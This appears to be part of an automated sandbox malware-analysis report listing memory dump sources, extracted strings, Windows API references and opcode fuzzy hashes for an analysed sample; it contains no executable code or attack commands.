                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \--5$\--5
                                                                • API String ID: 0-425160104
                                                                • Opcode ID: efc2f41084dec388023e6557bc7b634c612c9f718ba62a5da647b80ec013a995
                                                                • Instruction ID: eea12876cb8d7dbc7b9dcff3204853efb44bf6bf4008ed0a3d527df18a693d92
                                                                • Opcode Fuzzy Hash: efc2f41084dec388023e6557bc7b634c612c9f718ba62a5da647b80ec013a995
                                                                • Instruction Fuzzy Hash: D9216030E1020A9BCB09CFA5D4506DEF7B6BF85300F54C62AE825EB390DB709C86CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `,-5$`,-5
                                                                • API String ID: 0-2798089182
                                                                • Opcode ID: 0a1a8464cf0753e7641d4a6ae23a51a91ce33dc5f43c38c2a6bc29b8a0ceae91
                                                                • Instruction ID: afb35e882a3d0ebbe266c1686aa86202e31108a24b7ff156a34d19a529183d32
                                                                • Opcode Fuzzy Hash: 0a1a8464cf0753e7641d4a6ae23a51a91ce33dc5f43c38c2a6bc29b8a0ceae91
                                                                • Instruction Fuzzy Hash: 30219231E042199BCB09CFA5D4645DEB7F2BF89300F21862AE825F7350DBB09C86CB41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `,-5$`,-5
                                                                • API String ID: 0-2798089182
                                                                • Opcode ID: dfd34db0c04b8fe5b0f8621e8259967ee46522e825ee771d621d62ab30732c4a
                                                                • Instruction ID: b00c45e643a7e1b3d464dfd29bfeefb5a57d2a9657c9bb9451a854e2fcd37aa4
                                                                • Opcode Fuzzy Hash: dfd34db0c04b8fe5b0f8621e8259967ee46522e825ee771d621d62ab30732c4a
                                                                • Instruction Fuzzy Hash: 22215031E042099BDB09CFA5C4545DEF7B2AF89310F11862AE825F7350DBB0AD85CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q
                                                                • API String ID: 0-127220927
                                                                • Opcode ID: 922ed459a4659d363ce5c399245268e18fb57d816c28a08b9a91acba62a5e798
                                                                • Instruction ID: a59dfc81f67f54981bf9157a6ec515ed1e88e76bb71e331aaf8633a86da00200
                                                                • Opcode Fuzzy Hash: 922ed459a4659d363ce5c399245268e18fb57d816c28a08b9a91acba62a5e798
                                                                • Instruction Fuzzy Hash: 1901F4346002899BE728DA65CA91B9B77F7BB48340F1044AAC901AB7C0DB719C52CBA4
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35C9D502
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 731b5842ac548cfc9181d34411574bb8e9593c26c99e6869c9f726d7138e1dde
                                                                • Instruction ID: bfa2fd2153f7433d01221c509dc5cb50d4d6e5b25f6a592437a9bd2261c6f76d
                                                                • Opcode Fuzzy Hash: 731b5842ac548cfc9181d34411574bb8e9593c26c99e6869c9f726d7138e1dde
                                                                • Instruction Fuzzy Hash: 9851D0B5C00309DFDB14CFA9C984ADEBBB5BF48304F61852AE819BB210D774A945CF91
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35C9D502
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 92b8a3d2199582602fa00b7846a464f4421216ca11f27aab87b1e827bc5bce2b
                                                                • Instruction ID: c216dae79f447780d4b150fbf26c129a86af223a796caffb46c33976bac30332
                                                                • Opcode Fuzzy Hash: 92b8a3d2199582602fa00b7846a464f4421216ca11f27aab87b1e827bc5bce2b
                                                                • Instruction Fuzzy Hash: 9741C0B1D00309DFDB14CF9AC894ADEBBB5FF48314F61852AE819AB210D774A945CF91
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 35C9FBF1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: 3a6fa7ed3554e7ca243735fd4f293979962357080a14ddf4edff9ec254eb36bb
                                                                • Instruction ID: fc511119ba936f2a1f35a42d436197a0c3c32b83f9ace246f0246c787ba7c5b6
                                                                • Opcode Fuzzy Hash: 3a6fa7ed3554e7ca243735fd4f293979962357080a14ddf4edff9ec254eb36bb
                                                                • Instruction Fuzzy Hash: B9411DB5910305CFDB15CF99C484A9ABBF5FF88314F24C859D519A7321D7B4A941CFA0
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35C930D7
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 99e73fe9f6453e9aaa1ef8f98b6e904c80c7a82013c6c12c056bad24fca92dd2
                                                                • Instruction ID: 46b552023213c5d15eceaa079360178541c13bc88b045862927cb4769e199cbe
                                                                • Opcode Fuzzy Hash: 99e73fe9f6453e9aaa1ef8f98b6e904c80c7a82013c6c12c056bad24fca92dd2
                                                                • Instruction Fuzzy Hash: 6321E2B5D002099FDB10CFAAD584AEEBBF5FF48314F10845AE919A7350C378A940CFA1
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35C930D7
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: a5ce082337bda1412339f485be63b857f538ee66d6cc72098973723cd9416949
                                                                • Instruction ID: 7c1c0e1b5b7ce6b1f6b5825fbc96266193167f8014e36f4786a8673475bf3bb4
                                                                • Opcode Fuzzy Hash: a5ce082337bda1412339f485be63b857f538ee66d6cc72098973723cd9416949
                                                                • Instruction Fuzzy Hash: 6F21C4B59002499FDB10CFAAD584ADEFBF5FF48314F14841AE918A7350D379A940CFA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \Vmm
                                                                • API String ID: 0-738080011
                                                                • Opcode ID: 33612bd4b8aef8c40694140e895e5d110cd90571b243ccdfcd82e94e5f5f87ac
                                                                • Instruction ID: c403c553d78caf6e168fca48324c8284200e5bcb005704609bbc115fe14ea7b6
                                                                • Opcode Fuzzy Hash: 33612bd4b8aef8c40694140e895e5d110cd90571b243ccdfcd82e94e5f5f87ac
                                                                • Instruction Fuzzy Hash: 5B917070E0020ADFDF18CFA9C9857EDBBF1AF48714F148139E415A7294EB749986CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: bfae06534454c3bf4c2c7d2aa6e2760b277689c6910cb8d9f6248f9426c84409
                                                                • Instruction ID: d36bb6715f7b506c41d9670c189603c988d9e4bac71fc51c3cd3b9b9f041d902
                                                                • Opcode Fuzzy Hash: bfae06534454c3bf4c2c7d2aa6e2760b277689c6910cb8d9f6248f9426c84409
                                                                • Instruction Fuzzy Hash: 1871C334B102058FEB0AAB68D550AAEB7A3FF84354F1044B9D806DB395DF35DD46CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: dd28b21e55eece2c2e2dd1396103f0f698e81fd4278cebcf9a62db8ef3d15956
                                                                • Instruction ID: f073a0fa10a78998ee2ef453252a0ddcd33f6706a42956a7130c4b48fc58642b
                                                                • Opcode Fuzzy Hash: dd28b21e55eece2c2e2dd1396103f0f698e81fd4278cebcf9a62db8ef3d15956
                                                                • Instruction Fuzzy Hash: 9541E230A44305DFEB15DFA5D598A9EBBB2FF85340FA045A9E409EB240DB74E906CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: J-5U
                                                                • API String ID: 0-1548277051
                                                                • Opcode ID: 1c699899a9a9fb473f506194ff97b2faf7283dd850c9f7b312d2eee0ed901817
                                                                • Instruction ID: ddc14831b820a4494f294269c0c2f6bbdf2b3c902dcf592104831a7b35659a96
                                                                • Opcode Fuzzy Hash: 1c699899a9a9fb473f506194ff97b2faf7283dd850c9f7b312d2eee0ed901817
                                                                • Instruction Fuzzy Hash: 19416175A006058FEB30CEA9D8C0A9FFBF2FB84310F10496AD695DB660D731E9458B91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: 146ed310a2f006be38a3b4b709541837d8c95a3ba4a83e28b9f0b91c474f5d17
                                                                • Instruction ID: 4886b932bda06dff1cf173f8674e14b8ab30d30356c83dac98fbc96becea2058
                                                                • Opcode Fuzzy Hash: 146ed310a2f006be38a3b4b709541837d8c95a3ba4a83e28b9f0b91c474f5d17
                                                                • Instruction Fuzzy Hash: EE41E0307002018FDB18AB38C5646AF7BE6AF84350B24467DD40ADB395DF38CC86CB95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH]q
                                                                • API String ID: 0-3168235125
                                                                • Opcode ID: ada1980d687fd6f0d25a3ce2b197ecdc4dfae84a4c6633f73fac41d5db3e4cdc
                                                                • Instruction ID: 0165abc071be7cf4ab8fa5f76b7710f41f547b0b3bd0123f9ca605b38ece0be1
                                                                • Opcode Fuzzy Hash: ada1980d687fd6f0d25a3ce2b197ecdc4dfae84a4c6633f73fac41d5db3e4cdc
                                                                • Instruction Fuzzy Hash: 0431DD34B002118FEB09AB74D954A9E7BE3BB89390F1049B8D806DB395DF34DD46CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q
                                                                • API String ID: 0-3081347316
                                                                • Opcode ID: 08489130cff8890f1d8aec621612588e4ad14e3888b22e29bcf2f4a2caa06703
                                                                • Instruction ID: 5afb194dc83c1c36e98cc3dcf55d1821b4db3621223da22f691251feaa79364e
                                                                • Opcode Fuzzy Hash: 08489130cff8890f1d8aec621612588e4ad14e3888b22e29bcf2f4a2caa06703
                                                                • Instruction Fuzzy Hash: DB314170E1021A9BDB18CFA5D8547EEB7B5EF45314F108539E406EB280E7B59886CB41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |
                                                                • API String ID: 0-2343686810
                                                                • Opcode ID: 94561b912817b39fed20bc802b38b8e6785b816531db8c13ab7237baf5dd2624
                                                                • Instruction ID: 26ec140b0008707b7dc45145ce02be49cd43df2cd7bc182b80c87985ac2acdc1
                                                                • Opcode Fuzzy Hash: 94561b912817b39fed20bc802b38b8e6785b816531db8c13ab7237baf5dd2624
                                                                • Instruction Fuzzy Hash: D721DEB0F00310AFDB44AB789848B9D7BF1AF49350F0144AAE44AEB390DB359902CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |
                                                                • API String ID: 0-2343686810
                                                                • Opcode ID: 6a7f821e8ad11911f58f0b6a5c59c069e67c757236ffcdcca52a6c0ae6b84508
                                                                • Instruction ID: 98d5552c0225d7858bc67f547da68a6b98251f465ca8e176f240da2197dbcc2c
                                                                • Opcode Fuzzy Hash: 6a7f821e8ad11911f58f0b6a5c59c069e67c757236ffcdcca52a6c0ae6b84508
                                                                • Instruction Fuzzy Hash: 25114C74F103149FDB54EB788808B6D7BF1AB4C710F10446AE50AEB390DB7599018B81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \Obq
                                                                • API String ID: 0-2878401908
                                                                • Opcode ID: 0734d5e00be9799e3598cf9bcd27dd2f4b7b58c1d7e7055f9f07a1dada38aaac
                                                                • Instruction ID: e99a2c15f0018ff20765e90e1877c8e512fa217a1abc5916c3d0b1f680c55f17
                                                                • Opcode Fuzzy Hash: 0734d5e00be9799e3598cf9bcd27dd2f4b7b58c1d7e7055f9f07a1dada38aaac
                                                                • Instruction Fuzzy Hash: E4F0FE71E20219DFDB10DF90E859BAEBBB2FF84700F204119E442A7294CBB41C41DF80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cc0beeb586737b761805c92a1052b12cafcd40956755ae30608b64db1a858f8
                                                                • Instruction ID: 12422a3867fa6105a7ab8054992bb45a00e0b35c6550e920d79e9fdbf5d999ef
                                                                • Opcode Fuzzy Hash: 3cc0beeb586737b761805c92a1052b12cafcd40956755ae30608b64db1a858f8
                                                                • Instruction Fuzzy Hash: 35A17A70A002098FDB18DFA9E8907AEBBB2FF85310F10857AD919DB285D734D885CB91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a327118c00ef0aab27ba1cdb41c8c3e493f2a163ed509ed759853885a4fffbec
                                                                • Instruction ID: b46548bf6e0834fb925d1f0cc4a3c157c390cc473b0c09333112ba9b67cb38b0
                                                                • Opcode Fuzzy Hash: a327118c00ef0aab27ba1cdb41c8c3e493f2a163ed509ed759853885a4fffbec
                                                                • Instruction Fuzzy Hash: 26A14D70E04219CFDF18CFA8D9857DDBBF1AF88714F148139D419AB294EB749885CB85
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ffda2695ba7b1f51a733e75a4677e58018f56e90ea61f33fb5840e4d5b5269c
                                                                • Instruction ID: a8df1f2d25846c639255487f10d6c2cde1f1fd8e74e6cc754a93db6ef55cf49c
                                                                • Opcode Fuzzy Hash: 8ffda2695ba7b1f51a733e75a4677e58018f56e90ea61f33fb5840e4d5b5269c
                                                                • Instruction Fuzzy Hash: C7818A30B002468BDB04DFA9C954A9EB7F3AB85344F118569D40AEB394EF34DC878B82
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cdb70d41c7e509474fe6a5c35359e68f6bbf3d6486d653837a2e0a33d873ab0a
                                                                • Instruction ID: fe6a2ca446b49633e317e40f102941df48a3eb8b719370eb317603b423f6492e
                                                                • Opcode Fuzzy Hash: cdb70d41c7e509474fe6a5c35359e68f6bbf3d6486d653837a2e0a33d873ab0a
                                                                • Instruction Fuzzy Hash: 3D619DB5F001114FDB14AA6EC880A5EBADBAF94720B254479D80EDB360DFA9DD0287D1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 256a9e57b324c6658689e26f5e0ddba8f4ac9d06e801fd1304078ca6ebe7e04f
                                                                • Instruction ID: 7cd6efa5da7cba62f9c030994a15bd8ed408023c67c797c91445a5c4d32bfaa1
                                                                • Opcode Fuzzy Hash: 256a9e57b324c6658689e26f5e0ddba8f4ac9d06e801fd1304078ca6ebe7e04f
                                                                • Instruction Fuzzy Hash: A4911F34E006198BEB14DF64C890BDDB7B2FF89310F2086A9D54DBB255DB70AA85CF91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4678303465cb1a56502e5da03926a561a2d78ab2005d7507a817512a75760ae5
                                                                • Instruction ID: 0c9e29ffddc98fb469233265efd5d4aece472261c9ae73826b452ada4e366f87
                                                                • Opcode Fuzzy Hash: 4678303465cb1a56502e5da03926a561a2d78ab2005d7507a817512a75760ae5
                                                                • Instruction Fuzzy Hash: 1451D5B47103049FFB14676CD954B5F269FEB8A750F20086AE40ADB3D6CA6CCC478396
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8162276d79656bfaa3fdff83af2872eac8e94d73825cde4091a4b4d79c5f5edb
                                                                • Instruction ID: eeba84052d7812979110723d563912837d0baaedd2f3ce2c3744d0afd565595e
                                                                • Opcode Fuzzy Hash: 8162276d79656bfaa3fdff83af2872eac8e94d73825cde4091a4b4d79c5f5edb
                                                                • Instruction Fuzzy Hash: 5651C3B87103149FFB14676DD954B6F269FEB89750F20082AE40ADB395CA6CCC4783A6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2875bf27a858eac7e2f8e1def19372da68945e95c9ce7d2bcb938af5e60a4cc4
                                                                • Instruction ID: 92b4e57b53fde8978920c3319a1b9f163a49d6d323b2ddfb323bca21e8aa7cf1
                                                                • Opcode Fuzzy Hash: 2875bf27a858eac7e2f8e1def19372da68945e95c9ce7d2bcb938af5e60a4cc4
                                                                • Instruction Fuzzy Hash: 32515B31B103149FCB09EFA8D990A9DB7F2FF88311B508568E806AB355DB75ED46CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4d2c1f992ce72d82b332879a59e0fe4559c2097ed28ec1bccee90aef74d6234d
                                                                • Instruction ID: 6c20a99315fc293526282009d68db1d748c8657a4ed13407a338bf170822dd68
                                                                • Opcode Fuzzy Hash: 4d2c1f992ce72d82b332879a59e0fe4559c2097ed28ec1bccee90aef74d6234d
                                                                • Instruction Fuzzy Hash: 8551A878A002058FEB25CF68C4C0B6EB7B3FB45350F2088AAD59ADF2A1D734D841CB91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ec48963696726562a17f2cdd84d4ec0553ad6c4a85f5079f66c3dd8358be5927
                                                                • Instruction ID: 29b08f9bcf8e7aa8a4fa04de33f9e3cc4ef30beecbe0eb9f030d669324049255
                                                                • Opcode Fuzzy Hash: ec48963696726562a17f2cdd84d4ec0553ad6c4a85f5079f66c3dd8358be5927
                                                                • Instruction Fuzzy Hash: 98518B35A106058FDB15EF68C584E99BBF6FF48310F1084A9E806EB361DB70EC02CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16e3c01d05c58c24dc381425eef41f99103c9b20bc750d86e1ce6044f3503f43
                                                                • Instruction ID: 81e48271b0d61cd903ff7b1dd68897c0283fbec76c3472dd7742e1ba669d2c5d
                                                                • Opcode Fuzzy Hash: 16e3c01d05c58c24dc381425eef41f99103c9b20bc750d86e1ce6044f3503f43
                                                                • Instruction Fuzzy Hash: 50510274E002188FDF18CFA9D885BEDBBB1BF48304F158129E859BB291D775A884CF95
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0196a5651c543508b68b6e1776456b4fbd2f360ac761bb2bf4303a361d688f6b
                                                                • Instruction ID: 0b4e0a75a01e43db3d05aad5e02c64f057f9238009ae8b96711f6019e2f3a546
                                                                • Opcode Fuzzy Hash: 0196a5651c543508b68b6e1776456b4fbd2f360ac761bb2bf4303a361d688f6b
                                                                • Instruction Fuzzy Hash: DC412572E143568FCB00CF79C8446AABFF1AF89310F1185AAD818AB251DB78D985CBD1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 199e17a8c0ec72fa7d504914a6cde284c7f2e97c260a735a98929e7f27563120
                                                                • Instruction ID: 15b6061fb45d8ca7101d4c6f331520468a9641baaabba1d083abf4c7feab88bc
                                                                • Opcode Fuzzy Hash: 199e17a8c0ec72fa7d504914a6cde284c7f2e97c260a735a98929e7f27563120
                                                                • Instruction Fuzzy Hash: AC511374E002188FDB18CFA9D885BDDBBB1BF48304F158129E819BB391D779A884CB95
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4038870334c9c3051f4caefa5cf29699c26542ef5260094f7f6e93b023fa7d3f
                                                                • Instruction ID: 28337d2999eefeeb49e6dc401105290834eb57a5aa687a348934f5458ab41c56
                                                                • Opcode Fuzzy Hash: 4038870334c9c3051f4caefa5cf29699c26542ef5260094f7f6e93b023fa7d3f
                                                                • Instruction Fuzzy Hash: 854127346106058FD715EB69C994E9ABBF6FF88710B1094A9E806EB374DB70EC46CF50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
